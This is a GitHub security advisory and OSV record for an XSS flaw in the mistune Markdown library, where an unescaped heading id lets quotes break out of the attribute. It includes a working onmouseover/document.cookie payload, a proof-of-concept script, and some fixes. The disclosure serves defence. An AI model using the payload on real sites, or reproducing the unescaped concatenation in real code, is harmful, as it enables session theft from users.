GHSA-V87V-83H2-53W7

Vulnerability from github – Published: 2026-05-09 00:13 – Updated: 2026-05-09 00:13
Summary
Mistune Heading ID Attribute has Injection XSS
Details

Summary

HTMLRenderer.heading() builds the opening <hN> tag by string-concatenating the id attribute value directly into the HTML — with no call to escape(), safe_entity(), or any other sanitisation function. A double-quote character " in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element.

The default TOC hook assigns safe auto-incremented IDs (toc_1, toc_2, …) that never contain user text. However, the add_toc_hook() API accepts a caller-supplied heading_id callback. Deriving heading IDs from the heading text itself, to produce human-readable slug anchors like #installation or #getting-started, is a very common use of this callback and mirrors what many documentation generators do. When the callback returns raw heading text, an attacker who controls heading content can break out of the id= attribute.

Details

File: src/mistune/renderers/html.py

def heading(self, text: str, level: int, **attrs: Any) -> str:
    tag = "h" + str(level)
    html = "<" + tag
    _id = attrs.get("id")
    if _id:
        html += ' id="' + _id + '"'    # ← _id is never escaped
    return html + ">" + text + "</" + tag + ">\n"

The text body (the heading's inline content) is escaped upstream by the inline token renderer, which is why a double quote in text arrives as &quot;. But _id arrives as a raw string, exactly as the heading_id callback returned it; nothing in the pipeline escapes it before it is concatenated into the tag.
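One way to close this gap is to escape the id value before concatenating it. The sketch below is a standalone function, not the actual upstream patch: the name heading_escaped is hypothetical, and html.escape from the Python standard library stands in for whatever helper mistune uses internally.

```python
import html
from typing import Any


def heading_escaped(text: str, level: int, **attrs: Any) -> str:
    """Standalone variant of heading() that escapes the id attribute value."""
    tag = "h" + str(level)
    out = "<" + tag
    _id = attrs.get("id")
    if _id:
        # quote=True also converts " and ', so the value cannot end the attribute.
        out += ' id="' + html.escape(str(_id), quote=True) + '"'
    # text is assumed to be already-escaped inline HTML, as in the original.
    return out + ">" + text + "</" + tag + ">\n"


payload = 'foo" onmouseover="alert(document.cookie)" x="'
print(heading_escaped("foo", 2, id=payload))
```

With the quotes converted to &quot;, the whole payload stays inside the id value and no extra attribute is created.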

PoC

Step 1 — Establish the baseline (safe default IDs)

The script creates a parser with escape=True and the default add_toc_hook() (no custom heading_id callback). The default hook generates sequential numeric IDs:

md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)          # default: heading_id produces toc_1, toc_2, …

bl_src = "## Introduction\n"
bl_out, _ = md_safe.parse(bl_src)

Output — ID is auto-generated, no user text appears in it:

<h2 id="toc_1">Introduction</h2>

Step 2 — Add the realistic trigger: a text-based heading_id callback

Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, mkdocs, sphinx, jekyll all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation:

def raw_id(token, index):
    return token.get("text", "")   # returns raw heading text as the ID

md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

Step 3 — Craft the exploit payload

Construct a heading whose text contains a double-quote followed by an injected attribute:

## foo" onmouseover="alert(document.cookie)" x="

When raw_id is called, token["text"] is foo" onmouseover="alert(document.cookie)" x=". This is passed verbatim to heading() as the id attribute value.
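The effect of that verbatim pass-through can be reproduced without mistune installed. The following sketch copies the concatenation from the Details section into a free function (heading_unescaped is a hypothetical name used only here) and feeds it the payload directly.

```python
def heading_unescaped(text: str, level: int, **attrs) -> str:
    """Copy of the concatenation shown in the Details section."""
    tag = "h" + str(level)
    out = "<" + tag
    _id = attrs.get("id")
    if _id:
        out += ' id="' + _id + '"'  # no escaping, as in the vulnerable code
    return out + ">" + text + "</" + tag + ">\n"


payload = 'foo" onmouseover="alert(document.cookie)" x="'
opening = heading_unescaped("", 2, id=payload)
print(opening)
```

The first double quote in the payload closes id, and the trailing x=" absorbs the closing quote that the renderer appends, so the tag stays syntactically valid.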

Step 4 — Observe attribute breakout in the output

ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
ex_out, _ = md_vuln.parse(ex_src)

Actual output:

<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>

Note: the heading body text is correctly escaped (&quot;), but the id= attribute is not. A user who moves their mouse over the heading triggers alert(document.cookie). Any JavaScript payload can be substituted.
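To confirm that a browser-style parser really sees three attributes rather than one, the output can be fed to the standard library's html.parser. This is a minimal check on the output string from Step 4; the AttrCollector class is a helper written for this illustration.

```python
from html.parser import HTMLParser


class AttrCollector(HTMLParser):
    """Records the attribute list of every start tag it sees."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, attrs))


# Output string copied from Step 4.
rendered = (
    '<h2 id="foo" onmouseover="alert(document.cookie)" x="">'
    "foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>"
)

collector = AttrCollector()
collector.feed(rendered)
collector.close()
tag, attrs = collector.tags[0]
attr_names = [name for name, _ in attrs]
print(tag, attr_names)
```

A heading whose id was properly escaped would yield a single id attribute here; any additional name in the list indicates attribute breakout.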

Script

A verification script reproduces the issue. It writes an HTML page that shows the injected attribute rendering in the browser.

#!/usr/bin/env python3
"""H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook

def raw_id(token, index):
    return token.get("text", "")

# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_file = "baseline_h2.md"
bl_src  = "## Introduction\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
bl_out, _ = md_safe.parse(bl_src)

print(f"[{bl_file}]\n{bl_src}")
print("[output — id=toc_1, no user content, safe]")
print(bl_out)

# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

ex_file = "exploit_h2.md"
ex_src  = '## foo" onmouseover="alert(document.cookie)" x="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
ex_out, _ = md_vuln.parse(ex_src)

print(f"[{ex_file}]\n{ex_src}")
print("[output — heading_id returns raw text, id= not escaped]")
print(ex_out)

# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit  .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""

def case(kind, label, filename, src, out):
    return f"""
<div class="case {kind}">
  <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
  <div class="panels">
    <div class="panel">
      <h3>Input — {h.escape(filename)}</h3>
      <pre>{h.escape(src)}</pre>
    </div>
    <div class="panel">
      <h3>Output — HTML source</h3>
      <pre>{h.escape(out)}</pre>
      <div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div>
      <div class="rendered">{out}</div>
    </div>
  </div>
</div>"""

page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body>
<h1>H2 — Heading ID XSS (unescaped id= attribute)</h1>
<p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping.
Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p>
{case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)}
{case("exploit",  "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)}
</body></html>"""

out_path = os.path.join(os.getcwd(), "report_h2.html")
with open(out_path, "w") as f:
    f.write(page)
print(f"\n[report] {out_path}")

Example Usage:

python poc.py

Once the script is run, open report_h2.html in the browser and observe the behaviour.

Impact

| Dimension | Assessment |
|---|---|
| Confidentiality | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction |
| Integrity | DOM manipulation, phishing content injection, forced navigation |
| Availability | Page freeze or crash available to attacker |

Risk context: This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's heading_id callback without independently sanitising the returned value.
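For applications that cannot upgrade immediately, the returned value can be sanitised on the caller's side. The sketch below wraps any heading_id callback so that its result contains only lowercase ASCII letters, digits, underscores, and hyphens. The wrapper name slug_safe and the fallback ID format are assumptions made for this example; the (token, index) signature is the one used by the PoC.

```python
import re
from typing import Any, Callable, Dict

HeadingId = Callable[[Dict[str, Any], int], str]


def slug_safe(callback: HeadingId) -> HeadingId:
    """Wrap a heading_id callback so its result only contains [a-z0-9_-]."""

    def wrapper(token: Dict[str, Any], index: int) -> str:
        raw = str(callback(token, index)).lower()
        # Collapse every run of disallowed characters into a single hyphen.
        slug = re.sub(r"[^a-z0-9_-]+", "-", raw).strip("-")
        # Fall back to a positional ID if nothing usable is left.
        return slug or "heading-" + str(index)

    return wrapper


def raw_id(token, index):
    return token.get("text", "")


safe_id = slug_safe(raw_id)
print(safe_id({"text": 'foo" onmouseover="alert(document.cookie)" x="'}, 0))
```

The wrapped callback would then be passed as add_toc_hook(md, heading_id=slug_safe(raw_id)). Note that this allow-list also drops non-ASCII letters, so sites with non-English headings would need a broader pattern that still excludes quotes, angle brackets, and whitespace.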


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.2.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "mistune"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44897"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-09T00:13:12Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n`HTMLRenderer.heading()` builds the opening `\u003chN\u003e` tag by string-concatenating the `id` attribute value directly into the HTML \u2014 with no call to `escape()`, `safe_entity()`, or any other sanitisation function. A double-quote character `\"` in the `id` value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, `src=`, `href=`, etc.) into the heading element.\n\nThe default TOC hook assigns safe auto-incremented IDs (`toc_1`, `toc_2`, \u2026) that never contain user text. However, the `add_toc_hook()` API accepts a caller-supplied `heading_id` callback. Deriving heading IDs from the heading text itself \u2014 to produce human-readable slug anchors like `#installation` or `#getting-started` \u2014 is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the `id=` attribute.\n\n## Details\n**File:** `src/mistune/renderers/html.py`\n\n```python\ndef heading(self, text: str, level: int, **attrs: Any) -\u003e str:\n    tag = \"h\" + str(level)\n    html = \"\u003c\" + tag\n    _id = attrs.get(\"id\")\n    if _id:\n        html += \u0027 id=\"\u0027 + _id + \u0027\"\u0027    # \u2190 _id is never escaped\n    return html + \"\u003e\" + text + \"\u003c/\" + tag + \"\u003e\\n\"\n```\n\nThe `text` body (line content) *is* escaped upstream by the inline token renderer, which is why `text` arrives as `\u0026quot;` etc. But `_id` arrives as a raw string directly from whatever the `heading_id` callback returned \u2014 no escaping occurs at any point in the pipeline.\n\n## PoC\n**Step 1 \u2014 Establish the baseline (safe default IDs)**\n\nThe script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom `heading_id` callback). 
The default hook generates sequential numeric IDs:\n\n```python\nmd_safe = create_markdown(escape=True)\nadd_toc_hook(md_safe)          # default: heading_id produces toc_1, toc_2, \u2026\n\nbl_src = \"## Introduction\\n\"\nbl_out, _ = md_safe.parse(bl_src)\n```\n\nOutput \u2014 ID is auto-generated, no user text appears in it:\n```html\n\u003ch2 id=\"toc_1\"\u003eIntroduction\u003c/h2\u003e\n```\n\n**Step 2 \u2014 Add the realistic trigger: a text-based `heading_id` callback**\n\nDeriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, `mkdocs`, `sphinx`, `jekyll` all do this). The PoC uses the simplest possible version \u2014 return the raw heading text unchanged \u2014 to show the vulnerability without any extra transformation:\n\n```python\ndef raw_id(token, index):\n    return token.get(\"text\", \"\")   # returns raw heading text as the ID\n\nmd_vuln = create_markdown(escape=True)\nadd_toc_hook(md_vuln, heading_id=raw_id)\n```\n\n**Step 3 \u2014 Craft the exploit payload**\n\nConstruct a heading whose text contains a double-quote followed by an injected attribute:\n\n```\n## foo\" onmouseover=\"alert(document.cookie)\" x=\"\n```\n\nWhen `raw_id` is called, `token[\"text\"]` is `foo\" onmouseover=\"alert(document.cookie)\" x=\"`. This is passed verbatim to `heading()` as the `id` attribute value.\n\n**Step 4 \u2014 Observe attribute breakout in the output**\n\n```python\nex_src = \u0027## foo\" onmouseover=\"alert(document.cookie)\" x=\"\\n\u0027\nex_out, _ = md_vuln.parse(ex_src)\n```\n\nActual output:\n```html\n\u003ch2 id=\"foo\" onmouseover=\"alert(document.cookie)\" x=\"\"\u003efoo\u0026quot; onmouseover=\u0026quot;alert(document.cookie)\u0026quot; x=\u0026quot;\u003c/h2\u003e\n```\n\nNote: the heading **body text** is correctly escaped (`\u0026quot;`), but the **`id=` attribute** is not. A user who moves their mouse over the heading triggers `alert(document.cookie)`. 
Any JavaScript payload can be substituted.\n\n### Script \n\nA verification script was created to verify this issue. It creates a HTML page showing the bypass rendering in the browser.\n\n```python\n#!/usr/bin/env python3\n\"\"\"H2: HTMLRenderer.heading() inserts the id= value verbatim \u2014 no escaping.\"\"\"\nimport os, html as h\nfrom mistune import create_markdown\nfrom mistune.toc import add_toc_hook\n\ndef raw_id(token, index):\n    return token.get(\"text\", \"\")\n\n# --- baseline ---\nmd_safe = create_markdown(escape=True)\nadd_toc_hook(md_safe)\n\nbl_file = \"baseline_h2.md\"\nbl_src  = \"## Introduction\\n\"\nwith open(os.path.join(os.getcwd(), bl_file), \"w\") as f:\n    f.write(bl_src)\nbl_out, _ = md_safe.parse(bl_src)\n\nprint(f\"[{bl_file}]\\n{bl_src}\")\nprint(\"[output \u2014 id=toc_1, no user content, safe]\")\nprint(bl_out)\n\n# --- exploit ---\nmd_vuln = create_markdown(escape=True)\nadd_toc_hook(md_vuln, heading_id=raw_id)\n\nex_file = \"exploit_h2.md\"\nex_src  = \u0027## foo\" onmouseover=\"alert(document.cookie)\" x=\"\\n\u0027\nwith open(os.path.join(os.getcwd(), ex_file), \"w\") as f:\n    f.write(ex_src)\nex_out, _ = md_vuln.parse(ex_src)\n\nprint(f\"[{ex_file}]\\n{ex_src}\")\nprint(\"[output \u2014 heading_id returns raw text, id= not escaped]\")\nprint(ex_out)\n\n# --- HTML report ---\nCSS = \"\"\"\nbody{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}\nh1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}\np.desc{color:#555;font-size:.9em;margin-top:6px}\n.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}\n.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}\n.baseline .case-header{background:#d1fae5;color:#065f46}\n.exploit  .case-header{background:#fee2e2;color:#7f1d1d}\n.panels{display:grid;grid-template-columns:1fr 
1fr;background:#fff}\n.panel{padding:16px}\n.panel+.panel{border-left:1px solid #eee}\n.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}\npre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}\n.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}\n.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}\n\"\"\"\n\ndef case(kind, label, filename, src, out):\n    return f\"\"\"\n\u003cdiv class=\"case {kind}\"\u003e\n  \u003cdiv class=\"case-header\"\u003e{\u0027BASELINE\u0027 if kind==\u0027baseline\u0027 else \u0027EXPLOIT\u0027} \u2014 {h.escape(label)}\u003c/div\u003e\n  \u003cdiv class=\"panels\"\u003e\n    \u003cdiv class=\"panel\"\u003e\n      \u003ch3\u003eInput \u2014 {h.escape(filename)}\u003c/h3\u003e\n      \u003cpre\u003e{h.escape(src)}\u003c/pre\u003e\n    \u003c/div\u003e\n    \u003cdiv class=\"panel\"\u003e\n      \u003ch3\u003eOutput \u2014 HTML source\u003c/h3\u003e\n      \u003cpre\u003e{h.escape(out)}\u003c/pre\u003e\n      \u003cdiv class=\"rlabel\"\u003e\u2193 rendered in browser (hover the heading to trigger onmouseover)\u003c/div\u003e\n      \u003cdiv class=\"rendered\"\u003e{out}\u003c/div\u003e\n    \u003c/div\u003e\n  \u003c/div\u003e\n\u003c/div\u003e\"\"\"\n\npage = f\"\"\"\u003c!DOCTYPE html\u003e\u003chtml lang=\"en\"\u003e\u003chead\u003e\u003cmeta charset=\"UTF-8\"\u003e\n\u003ctitle\u003eH2 \u2014 Heading ID XSS\u003c/title\u003e\u003cstyle\u003e{CSS}\u003c/style\u003e\u003c/head\u003e\u003cbody\u003e\n\u003ch1\u003eH2 \u2014 Heading ID XSS (unescaped id= attribute)\u003c/h1\u003e\n\u003cp class=\"desc\"\u003eHTMLRenderer.heading() in renderers/html.py does html += \u0027 id=\"\u0027 + _id + \u0027\"\u0027 with no escaping.\nTriggered when heading_id callback returns raw heading text \u2014 the most common 
doc-generator pattern.\u003c/p\u003e\n{case(\"baseline\", \"Clean heading \u2192 sequential id=toc_1, safe\", bl_file, bl_src, bl_out)}\n{case(\"exploit\",  \"Malicious heading \u2192 quotes break out of id=, onmouseover injected\", ex_file, ex_src, ex_out)}\n\u003c/body\u003e\u003c/html\u003e\"\"\"\n\nout_path = os.path.join(os.getcwd(), \"report_h2.html\")\nwith open(out_path, \"w\") as f:\n    f.write(page)\nprint(f\"\\n[report] {out_path}\")\n```\n\nExample Usage:\n```bash\npython poc.py\n```\n\nOnce the script is run, open `report_h2.html` in the browser and observe the behaviour.\n\n## Impact\n| Dimension        | Assessment |\n|------------------|-----------|\n| **Confidentiality** | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction |\n| **Integrity**    | DOM manipulation, phishing content injection, forced navigation |\n| **Availability** | Page freeze or crash available to attacker |\n\n**Risk context:** This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune\u0027s `heading_id` callback without independently sanitising the returned value.",
  "id": "GHSA-v87v-83h2-53w7",
  "modified": "2026-05-09T00:13:12Z",
  "published": "2026-05-09T00:13:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lepture/mistune/security/advisories/GHSA-v87v-83h2-53w7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lepture/mistune"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mistune Heading ID Attribute has Injection XSS"
}
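The affected range in the record above (introduced at 0, fixed in 3.2.1) can be turned into a quick local check. This is a rough sketch using only the standard library: parse_release and is_affected are hypothetical helpers, and the simple numeric comparison treats pre-releases such as 3.2.1rc1 conservatively as affected.

```python
from importlib import metadata


def parse_release(version: str) -> tuple:
    """Turn '3.2.0' into (3, 2, 0); stops at the first non-numeric part."""
    parts = []
    for piece in version.split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts)


def is_affected(version: str) -> bool:
    # The record marks 3.2.1 as the first fixed release.
    return parse_release(version) < (3, 2, 1)


try:
    installed = metadata.version("mistune")
    print(installed, "affected" if is_affected(installed) else "fixed")
except metadata.PackageNotFoundError:
    print("mistune is not installed")
```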

